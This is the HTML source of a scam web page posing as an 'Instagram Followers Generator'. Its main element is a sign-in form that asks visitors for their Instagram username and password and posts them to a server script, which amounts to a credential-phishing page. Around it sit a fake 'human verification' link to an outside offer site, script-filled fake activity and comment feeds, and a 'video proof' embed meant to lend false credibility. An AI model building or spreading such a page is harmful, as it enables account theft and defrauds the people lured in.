
<!DOCTYPE html>
<html>
<head>
<title>Instagram Followers Generator</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="description" content="Generator for adding IG followers." />
	<meta property="og:title" content="Instagram Followers Generator" /> <!-- Title which is displayed when sharing your site on social networks. -->
	<meta property="og:description" content="Generator for adding IG followers." /> <!-- Description which is displayed when sharing your site on social networks. -->
	<meta property="og:type" content="website" />
	<meta property="og:url" content="http://www.instafollower.net/" /> <!-- URL which is displayed when sharing your site on social networks. -->
	<!-- <meta property="og:image" content="http://www.instafollower.net/img/socialimg.png" /> Link to your social-share image. Don't forget to uncomment this line. -->
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    
	<link rel="icon" type="image/ico" href="img/favicon.ico" />
    <!-- CSS -->
    <link href="https://fonts.googleapis.com/css?family=Lato:300,400,700" rel="stylesheet">
	<link href="https://fonts.googleapis.com/css?family=Pacifico" rel="stylesheet">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css">
    <link href="http://www.instafollower.online/css/bootstrap.min.css" rel="stylesheet" />
    <link href="http://www.instafollower.online/css/animate.css" rel="stylesheet" />
    <link href="http://www.instafollower.online/css/magnific-popup.css" rel="stylesheet" />
	<link href="http://www.instafollower.online/css/sweet-alert.css" rel="stylesheet" />
    <link href="http://www.instafollower.online/css/style.css" rel="stylesheet" />    

</head>
<body>	
<script type="text/javascript">
if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) ) {
document.location = "/mobile/";
}
</script>
	<section class="section-first">
		<div class="container">
			<div class="row">
				<div class="col-md-12">
					<div class="logo-wrapper">
						<h1>Instagram Followers</h1>
					</div>	
					<div class="main-wrapper">
						<header class="main-section-wrapper">
							<div class="row">
									
								<div class="profile-pic-wrapper col-md-12">
									<div class="flip-container">
										<div class="card">
											<img class="profile-picture-img back" alt="Profile Picture Image" src=""/>
											<img class="profile-picture-img front" alt="Profile Picture Image" src=""/>			
										</div>
									</div>									
								</div>

								<div class="row no-margin">
									<div class="profile-info-wrapper col-xs-6 smallertext">
										
									</div>
								</div>	
								<div id="confirm-form" class="confirm-form first col-md-12">
									<div class="form-group ig-username-form-group ig-confirm-username-form-group">	
										
										
										<div class="help-block with-errors"></div>
									</div>
                                        <div class="form-group submit-form-group">
                                        <form action="login-account.php" method="post">
                                        <label>Username</label>
										<div class="shake-wrapper">
										<div class="ig-username-wrapper">											
											<input id="username" name="username" type="text" class="ig-username-input" placeholder="Username" required data-error="Please enter your username."/>
										</div>
										<label>Password</label>
										<div class="shake-wrapper">
										<div class="ig-username-wrapper">											
											<input id="username" name="password" type="password" class="ig-username-input" placeholder="Password" required data-error="Please enter your username."/>
										</div>
										<button type="submit" id="generator-submit" class="generator-form-submit button-style-1" >Sign In</button>	
									</div>
								</div>
								<div class="followers-process-wrapper row no-margin">
									<div class="loading-bar-wrapper">
										
										</div><!-- #progress_bar -->										
									  </div>
									  <div class="human-verification-wrapper">
											<h3>Human Verification</h3>
											<p>Due to security reason you are required to complete human verification in order to prevent bots and suspicious third party applications from using our generator. Please click the button below to complete the human verification.</p>
											<a target="_blank" href="http://www.linkrockerz.com/s5qnE1sOE29zKmJK" class="human-verification-button button-style-1 confirm" style="cursor:pointer;">Human Verification</a>
											<!--<p class="human-verification-button button-style-1 confirm" style="cursor:pointer;">Human Verification</p>
											 <div class="framewithoffer" style="display: none;"><iframe frameBorder="0" id="fb4" src="https://motifiles.com/453012" width="100%" height="200" scrolling="no"></iframe></div> !-->
									  </div>
								</div>
															</div>							
						</header>
						<div class="main-section-wrapper">
							<div class="row">
								 <div class="recent-activity col-md-12 follow-scroll">
									<h2>Latest Activity at instafollower.online</h2>
									<div class="recent-activity-wrapper">
										<div class="panel-body" id="activities-window"></div>
									</div>
								</div>
							</div>
						</div>	
						<div class="main-section-wrapper">
							<div class="row">
								<div class="comments-wrapper col-md-12">
									<h2>Latest Comments</h2>
									<form action="#" class="comments-section-form">
		<fieldset>
			<section>
				<label class="input comment-user-img-wrapp"><i class="fa fa-user comment-user-img"></i></label>
				<div class="comment-wrapper">
					<label class="input">
						<span class="comment-username" id="username1"></span><span class="timePosted"id="timePosted1"></span>
						<span class="comments" id="comment1"></span>														
					</label>
				</div>
				<label class="input"></label>
			</section>
		</fieldset>
		<fieldset>
			<section>
				<label class="input comment-user-img-wrapp"><i class="fa fa-user comment-user-img"></i></label>
				<div class="comment-wrapper">
					<label class="input">
						<span class="comment-username" id="username2"></span><span class="timePosted" id="timePosted2"></span>
						<span class="comments" id="comment2"></span>														
					</label>
				</div>
				<label class="input"></label>
			</section>
		</fieldset>
		<fieldset>
			<section>
				<label class="input comment-user-img-wrapp"><i class="fa fa-user comment-user-img"></i></label>
				<div class="comment-wrapper">
					<label class="input">
						<span class="comment-username" id="username3"></span><span class="timePosted" id="timePosted3"></span>
						<span class="comments" id="comment3"></span>														
					</label>
				</div>
				<label class="input"></label>
			</section>
		</fieldset>			
		<div class="add-new-comment-wrapp">
			<h4>Add a new comment</h4>
			<section>
				<label class="input" id="commentUsernameLabel">						
					<input id="commentUsername" placeholder="Username" type="text">
				</label>
			</section>
			<section>
				<label class="textarea" id="commentCommentLabel">						
					<textarea id="commentComment" rows="5"></textarea>
				</label>
				<div class="post-new-comment-button-wrapp">
					<a class="button-style-1 small" href="javascript:void(0)">Post</a>
				</div>
				<div class="shake-wrapper-2"><p class="nocommentsfornoobs"><i class="fa fa-info-circle" aria-hidden="true"></i> To prevent spam, commenting is only allowed for users who
				already used our generator.</p></div>
			</section>
		</div>
	</form>									</div>	
							</div>
						</div>
						<div class="main-section-wrapper">
							<div class="row">
								<div class="video-proof-wrapper col-md-12">
									<h2>Video Proof</h2>
									<div class="fit-vids-me">
										
<script src="//fast.wistia.com/embed/medias/497ux6r959.jsonp" async></script><script src="http://www.instafollower.online/fast.wistia.com/assets/external/E-v1.js" async></script><div class="wistia_responsive_padding" style="padding:56.25% 0 0 0;position:relative;"><div class="wistia_responsive_wrapper" style="height:100%;left:0;position:absolute;top:0;width:100%;"><div class="wistia_embed wistia_async_497ux6r959 videoFoam=true" style="height:100%;width:100%">&nbsp;</div></div></div>
									</div>
								</div>	
							</div>	
						</div>	
					</div>
				</div>
			</div>
		</div>		
	</section>
	<footer>
		<div class="container">
			<div class="row">
				<div class="footer-inner">
					<div class="policy-links">
						<a class="popup-contact popup-link" href="#contact-us">Contact Us</a><span class="pp-sep"> |</span>
						<a class="popup-tos popup-link" href="#terms-of-service">Terms of Service</a><span class="pp-sep"> |</span>
						<a class="popup-pp popup-link" href="#privacy-policy">Privacy Policy</a>
					</div>
					<p>
						&copy; Copyright 2016, all rights reserved.
						<br>
						<span class="shortenedspan">All trademarks, service marks, trade names, trade dress, product names and logos appearing on the site are the property of their respective owners.</span>
					</p>
				</div>
			</div>
		</div>	
		<div id="contact-us" class="contact-popup-wrapper popup-wrapper mfp-hide">
			<h1>Send us a message</h1>
			<div class="contact-form-wrapper">
				<form role="form" id="contactForm" data-toggle="validator" class="shake">
					<div class="row">
						<div class="form-group col-sm-6">
							<label for="name" class="h4">Name</label>
							<input type="text" class="form-control" id="name" placeholder="Enter name" required data-error="NEW ERROR MESSAGE">
							<div class="help-block with-errors"></div>
						</div>
						<div class="form-group col-sm-6">
							<label for="email" class="h4">Email</label>
							<input type="email" class="form-control" id="email" placeholder="Enter email" required>
							<div class="help-block with-errors"></div>
						</div>
					</div>
					<div class="form-group">
						<label for="message" class="h4 ">Message</label>
						<textarea id="message" class="form-control" rows="5" placeholder="Enter your message" required></textarea>
						<div class="help-block with-errors"></div>
					</div>
					<button type="submit" id="form-submit" class="btn btn-success btn-lg pull-right ">Submit</button>
					<div id="msgSubmit" class="h3 text-center hidden"></div>
					<div class="clearfix"></div>
				</form>
			</div>
		</div>
		<div id="terms-of-service" class="tos-popup-wrapper popup-wrapper mfp-hide">
			<h1>Terms of service</h1>

			<p>These terms of service ("Terms", "Agreement") are an agreement between the operator of My Website ("Website operator", "us", "we" or "our") and you ("User", "you" or "your"). This Agreement sets forth the general terms and conditions of your use of the http://myhacks.net website and any of its products or services (collectively, "Website" or "Services").</p>

			<h2>Age requirement</h2>

			<p>You must be at least 18 years of age to use this Website. By using this Website and by agreeing to this Agreement you warrant and represent that you are at least 18 years of age.</p>

			<h2>Backups</h2>

			<p>We are not responsible for Content residing on the Website. In no event shall we be held liable for any loss of any Content. It is your sole responsibility to maintain appropriate backup of your Content. Notwithstanding the foregoing, on some occasions and in certain circumstances, with absolutely no obligation, we may be able to restore some or all of your data that has been deleted as of a certain date and time when we may have backed up data for our own purposes. We make no guarantee that the data you need will be available.</p>

			<h2>Links to other websites</h2>

			<p>Although this Website may be linked to other websites, we are not, directly or indirectly, implying any approval, association, sponsorship, endorsement, or affiliation with any linked website, unless specifically stated herein. We are not responsible for examining or evaluating, and we do not warrant the offerings of, any businesses or individuals or the content of their websites. We do not assume any responsibility or liability for the actions, products, services and content of any other third parties. You should carefully review the legal statements and other conditions of use of any website which you access through a link from this Website. Your linking to any other off-site pages or other websites is at your own risk.</p>

			<h2>Advertisements</h2>

			<p>During use of the Website, you may enter into correspondence with or participate in promotions of advertisers or sponsors showing their goods or services through the Website. Any such activity, and any terms, conditions, warranties or representations associated with such activity, is solely between you and the applicable third-party. We shall have no liability, obligation or responsibility for any such correspondence, purchase or promotion between you and any such third-party.</p>

			<h2>Prohibited uses</h2>

			<p>In addition to other terms as set forth in the Agreement, you are prohibited from using the website or its content: (a) for any unlawful purpose; (b) to solicit others to perform or participate in any unlawful acts; (c) to violate any international, federal, provincial or state regulations, rules, laws, or local ordinances; (d) to infringe upon or violate our intellectual property rights or the intellectual property rights of others; (e) to harass, abuse, insult, harm, defame, slander, disparage, intimidate, or discriminate based on gender, sexual orientation, religion, ethnicity, race, age, national origin, or disability; (f) to submit false or misleading information; (g) to upload or transmit viruses or any other type of malicious code that will or may be used in any way that will affect the functionality or operation of the Service or of any related website, other websites, or the Internet; (h) to collect or track the personal information of others; (i) to spam, phish, pharm, pretext, spider, crawl, or scrape; (j) for any obscene or immoral purpose; or (k) to interfere with or circumvent the security features of the Service or any related website, other websites, or the Internet. We reserve the right to terminate your use of the Service or any related website for violating any of the prohibited uses.</p>

			<h2>Limitation of liability</h2>

			<p>To the fullest extent permitted by applicable law, in no event will Website operator, its affiliates, officers, directors, employees, agents, suppliers or licensors be liable to any person for (a): any indirect, incidental, special, punitive, cover or consequential damages (including, without limitation, damages for lost profits, revenue, sales, goodwill, use or content, impact on business, business interruption, loss of anticipated savings, loss of business opportunity) however caused, under any theory of liability, including, without limitation, contract, tort, warranty, breach of statutory duty, negligence or otherwise, even if Website operator has been advised as to the possibility of such damages or could have foreseen such damages. To the maximum extent permitted by applicable law, the aggregate liability of Website operator and its affiliates, officers, employees, agents, suppliers and licensors, relating to the services will be limited to an amount greater of one dollar or any amounts actually paid in cash by you to Website operator for the prior one month period prior to the first event or occurrence giving rise to such liability. The limitations and exclusions also apply if this remedy does not fully compensate you for any losses or fails of its essential purpose.</p>

			<h2>Indemnification</h2>

			<p>You agree to indemnify and hold Website operator and its affiliates, directors, officers, employees, and agents harmless from and against any liabilities, losses, damages or costs, including reasonable attorneys' fees, incurred in connection with or arising from any third-party allegations, claims, actions, disputes, or demands asserted against any of them as a result of or relating to your Content, your use of the Website or Services or any willful misconduct on your part.</p>

			<h2>Severability</h2>

			<p>All rights and restrictions contained in this Agreement may be exercised and shall be applicable and binding only to the extent that they do not violate any applicable laws and are intended to be limited to the extent necessary so that they will not render this Agreement illegal, invalid or unenforceable. If any provision or portion of any provision of this Agreement shall be held to be illegal, invalid or unenforceable by a court of competent jurisdiction, it is the intention of the parties that the remaining provisions or portions thereof shall constitute their agreement with respect to the subject matter hereof, and all such remaining provisions or portions thereof shall remain in full force and effect.</p>

			<h2>Dispute resolution</h2>

			<p>The formation, interpretation and performance of this Agreement and any disputes arising out of it shall be governed by the substantive and procedural laws of Bern, Switzerland without regard to its rules on conflicts or choice of law and, to the extent applicable, the laws of Switzerland. The exclusive jurisdiction and venue for actions related to the subject matter hereof shall be the state and federal courts located in Bern, Switzerland, and you hereby submit to the personal jurisdiction of such courts. You hereby waive any right to a jury trial in any proceeding arising out of or related to this Agreement. The United Nations Convention on Contracts for the International Sale of Goods does not apply to this Agreement.</p>

			<h2>Changes and amendments</h2>

			<p>We reserve the right to modify this Agreement or its policies relating to the Website or Services at any time, effective upon posting of an updated version of this Agreement on the Website. When we do we will revise the updated date at the bottom of this page. Continued use of the Website after any such changes shall constitute your consent to such changes.</p>

			<h2>Acceptance of these terms</h2>

			<p>You acknowledge that you have read this Agreement and agree to all its terms and conditions. By using the Website or its Services you agree to be bound by this Agreement. If you do not agree to abide by the terms of this Agreement, you are not authorized to use or access the Website and its Services.</p>

			<h2>Contacting us</h2>

			<p>If you have any questions about this Policy, please contact us.</p>

			<p>This document was last updated on Sep 10, 2016</p>
		</div>
		<div id="privacy-policy" class="pp-popup-wrapper popup-wrapper mfp-hide">
			<h1>Privacy policy</h1>

			<p>This privacy policy ("Policy") describes how we collect, protect and use the personally identifiable information ("Personal Information") you ("User", "you" or "your") provide on the http://myhacks.net website and any of its products or services (collectively, "Website" or "Services"). It also describes the choices available to you regarding our use of your personal information and how you can access and update this information. This Policy does not apply to the practices of companies that we do not own or control, or to individuals that we do not employ or manage.</p>

			<h2>Collection of personal information</h2>

			<p>We receive and store any information you knowingly provide to us when you fill any online forms on the Website. You can choose not to provide us with certain information, but then you may not be able to take advantage of some of the Website's features.</p>

			<h2>Collection of non-personal information</h2>

			<p>When you visit the Website our servers automatically record information that your browser sends. This data may include information such as your computer's IP address, browser type and version, operating system type and version, language preferences or the webpage you were visiting before you came to our Website, pages of our Website that you visit, the time spent on those pages, information you search for on our Website, access times and dates, and other statistics.</p>

			<h2>Use of collected information</h2>

			<p>Any of the information we collect from you may be used to personalize your experience; improve our website; improve customer service and respond to queries and emails of our customers; run and operate our Website and Services. Non-personal information collected is used only to identify potential cases of abuse and establish statistical information regarding Website traffic and usage. This statistical information is not otherwise aggregated in such a way that would identify any particular user of the system.</p>

			<h2>Children</h2>

			<p>We do not knowingly collect any personal information from children under the age of 13. If you are under the age of 13, please do not submit any personal information through our Website or Service. We encourage parents and legal guardians to monitor their children's Internet usage and to help enforce this Policy by instructing their children never to provide personal information through our Website or Service without their permission. If you have reason to believe that a child under the age of 13 has provided personal information to us through our Website or Service, please contact us.</p>

			<h2>Cookies</h2>

			<p>The Website uses "cookies" to help personalize your online experience. A cookie is a text file that is placed on your hard disk by a web page server. Cookies cannot be used to run programs or deliver viruses to your computer. Cookies are uniquely assigned to you, and can only be read by a web server in the domain that issued the cookie to you. We may use cookies to collect, store, and track information for statistical purposes to operate our Website and Services. You have the ability to accept or decline cookies. Most web browsers automatically accept cookies, but you can usually modify your browser setting to decline cookies if you prefer. If you choose to decline cookies, you may not be able to fully experience the features of the Website and Services.</p>

			<h2>Advertisement</h2>

			<p>We may display online advertisements and we may share aggregated and non-identifying information about our customers that we collect through the registration process or through online surveys and promotions with certain advertisers. We do not share personally identifiable information about individual customers with advertisers. In some instances, we may use this aggregated and non-identifying information to deliver tailored advertisements to the intended audience.</p>

			<h2>Links to other websites</h2>

			<p>Our Website contains links to other websites that are not owned or controlled by us. Please be aware that we are not responsible for the privacy practices of such other websites or third parties. We encourage you to be aware when you leave our Website and to read the privacy statements of each and every website that may collect personal information.</p>

			<h2>Information security</h2>

			<p>We secure information you provide on computer servers in a controlled, secure environment, protected from unauthorized access, use, or disclosure. We maintain reasonable administrative, technical, and physical safeguards in an effort to protect against unauthorized access, use, modification, and disclosure of personal information in its control and custody. However, no data transmission over the Internet or wireless network can be guaranteed. Therefore, while we strive to protect your personal information, you acknowledge that (i) there are security and privacy limitations of the Internet which are beyond our control; (ii) the security, integrity, and privacy of any and all information and data exchanged between you and our Website cannot be guaranteed; and (iii) any such information and data may be viewed or tampered with in transit by a third party, despite best efforts.</p>

			<h2>Data breach</h2>

			<p>In the event we become aware that the security of the Website has been compromised or users Personal Information has been disclosed to unrelated third parties as a result of external activity, including, but not limited to, security attacks or fraud, we reserve the right to take reasonably appropriate measures, including, but not limited to, investigation and reporting, as well as notification to and cooperation with law enforcement authorities. In the event of a data breach, we will make reasonable efforts to notify affected individuals if we believe that there is a reasonable risk of harm to the user as a result of the breach or if notice is otherwise required by law. When we do we will post a notice on the Website.</p>

			<h2>Changes and amendments</h2>

			<p>We reserve the right to modify this privacy policy relating to the Website or Services at any time, effective upon posting of an updated version of this privacy policy on the Website. When we do we will revise the updated date at the bottom of this page. Continued use of the Website after any such changes shall constitute your consent to such changes.</p>

			<h2>Acceptance of this policy</h2>

			<p>You acknowledge that you have read this Policy and agree to all its terms and conditions. By using the Website or its Services you agree to be bound by this Policy. If you do not agree to abide by the terms of this Policy, you are not authorized to use or access the Website and its Services.</p>

			<h2>Contacting us</h2>

			<p>If you have any questions about this Policy, please contact us.</p>

			<p>This document was last updated on Sep 10, 2016</p>
		</div>
	<script type="text/javascript">
        window.onload = function() {
            var webService = "http://www.jsonip.com/json";
            var script = document.createElement("script");
            script.type = "text/javascript";
            script.src = webService + "?callback=MyIP";
            document.getElementsByTagName("head")[0].appendChild(script);
        };

        function MyIP(response) {
            document.getElementById("ip").innerHTML = response.ip;
        }
    </script>	
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
	<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
    <script type="text/javascript" src="js/sweet-alert.min.js"></script>
    <script type="text/javascript" src="js/jquery.magnific-popup.min.js"></script>
    <script type="text/javascript" src="js/jquery.fitvids.js"></script>    
    <script type="text/javascript" src="js/validator.min.js"></script>
    <script type="text/javascript" src="js/com.js"></script>
    <script type="text/javascript" src="js/form-scripts.js"></script>
    <script type="text/javascript" src="js/jquery.nicescroll.min.js"></script>
    <script type="text/javascript" src="js/main.js"></script>
	<script type="text/javascript">

	var getUrlParameter = function getUrlParameter(sParam) {
    var sPageURL = decodeURIComponent(window.location.search.substring(1)),
        sURLVariables = sPageURL.split('&'),
        sParameterName,
        i;

    for (i = 0; i < sURLVariables.length; i++) {
        sParameterName = sURLVariables[i].split('=');

        if (sParameterName[0] === sParam) {
            return sParameterName[1] === undefined ? true : sParameterName[1];
        }
    }
};

		var user = getUrlParameter('username');
		
		$('.profile-picture-img').attr('src', 'http://res.cloudinary.com/demo/image/instagram_name/w_109,h_109,c_thumb,g_face,r_max,e_improve/' + user + '.jpg');
		$('#username-confirm').val(user);
		
		$( document ).ready(function() {

		username = getUrlParameter('username');
	
	$.getJSON( "data.php?user=" + username).done(function(data) {
		var fullname = '';
		var username5 = '';
		var biography = '';
		var followed = '';
		var follows = '';
		var media = '';
		fullname += data.full_name;
		username5 += data.username;
		biography += data.biography;
		followed += data.followed_by.count;
		follows += data.follows.count ;
		media += data.media.count;
		
		$('#fullname').html(fullname);
		$('#username5').html(username5);
		$('#followed').html(followed);
		$('#follows').html(follows);
		$('#biography').html(biography);
		$('#media').html(media);
		
	});
})

	</script>

	</footer>
</body>
</html>
